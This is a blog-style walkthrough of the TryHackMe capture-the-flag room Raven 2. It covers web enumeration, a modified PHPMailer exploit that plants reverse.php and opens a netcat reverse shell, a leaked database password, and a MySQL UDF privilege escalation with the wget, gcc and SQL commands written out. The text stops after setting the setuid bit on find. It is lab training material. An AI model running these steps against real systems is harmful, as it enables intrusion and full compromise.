TryHackMe | CTF | Walkthrough | Raven 2

6 min readJan 21, 2022

Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven2uy. Link: https://tryhackme.com/room/raven2uy

Information Gathering:
Let’s connect to target machine in TryHackme, using nmap on the virtual machine to collection information on the open ports. I head straight to website to find what’s it like on the webpage. Hopefully can get some flags there.

Ooohh!! almost forgot, I also ran gobuster on my machine. This gave me useful information about the directories present on the vulnerable machine.

FLAG 1:

Initially, I enumerated through each and every webpage on the 10.10.48.67:80. I did not find anything useful there.

Interestingly, /vendor directory was very helpful.

I opened the path folder, and look what I found!! It’s a flag!!

Flag 1 done and dusted. Let’s go yeahh!!!

FLAG 2:
Also, I checked out each and every folder on this directory. Version folder seems to be insightful.

I google if there were any exploits related to the number I found in the above step. Got an exploit with name PHP Mailer. Smooth!!

This part, took me weeks to get to the end. U guys are getting all this information smoothly!! Smash the like icon and follow me for updates on walkthrough’s. It helps, thanks if you did that.

I used wappalyzer to find out what is the website built with. I found since the exploit is for PHP then exploit can be linked with a PHP page. All the pages on port 80 were HTML pages. Finally, I found contact.php page made from PHP. Kudos to wappalyzer!!

I went to the script that I found on exploit DB. There were 3 major changes that I made in the script.
1. Set the target of vulnerability to <IP address>/contact.php where this vulnerability exists (read PHPMailer’s function)

2. Set the backdoor’s name. Let it be reverse.php for now (this is very strange but I tried using other names and they failed😭🥵, for some reason reverse.php is the only name that gives me the shell).

3. Set the local IP in the Subprocess call(Generally, your Kali Linux machine)

4. Finally, the location to upload the backdoor (/tmp -X/var/www/html/reverse.php server).

Run the anarcoder, wait for the success message.

Listening port should be turned on now using net cat, since the backdoor will open up a new connection on port 4444 using subprocess calling.

Woop woop!! reverse shell executed!! Flag found.

Running the python server to use Linpeas, tool used for enumerating on a linux machine. Credentials discovered by running the linpeas were the wordpress database credentials, username root and password R@v3nSecurity found.

mysql -u root -p password, command used to access the database from the credentials discovered above.

Commands used in the following steps are for to view the databases using <show databases>, select one of the databases use <database name>, show the tables of the databases <show tables> and displaying the contents of the table <Select * from table name>.

After enumerating through many database tables, I finally found the wp_users table where I found the link. I opened the link through url and guess what there was a flag sitting there waiting for me to grab. Wooop!! Wooop!!

FLAG 4:

We changed the active directory to /tmp and imported LinPrivChecker, a script to enumerate many of the basic and advanced Linux privilege escalation details.

I found that mysql was using root privileges. I checked for relevant escalation exploits. I found one checkout the link below.

Offensive Security's Exploit Database Archive

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2).. local exploit for Linux platform

www.exploit-db.com

The exploits run by compiling the raw C code to “.so” file and then transferring it to the victim machine and exploiting MySQL vulnerability.

The first step was to compile it.
Commands:
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

And hence, we transferred this “.so” file in the /tmp directory in the victim’s machine. Commands:
wget http://10.9.178.153/1518.so
chmod 777 1518.so

Now we logged in to the MySQL interface.

Command : mysql -u root -p

After getting a MySQL interface , we started exploiting it using the vulnerability we just found

Command: use mysql;
Now, we created a table called “foo”

In this table, we inserted the link to 1518.so file we just imported from the local machine to /tmp directory.

We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)

In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.

Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”

Commands:

create table foo(line blob);
insert into foo values(load_file(‘/tmp/1518.so’));
select * from foo into dumpfile ‘/usr/lib/mysql/plugin/1518.so’; create function do_system returns integer soname ‘1518.so’; select do_system(‘chmod u+s /usr/bin/find’);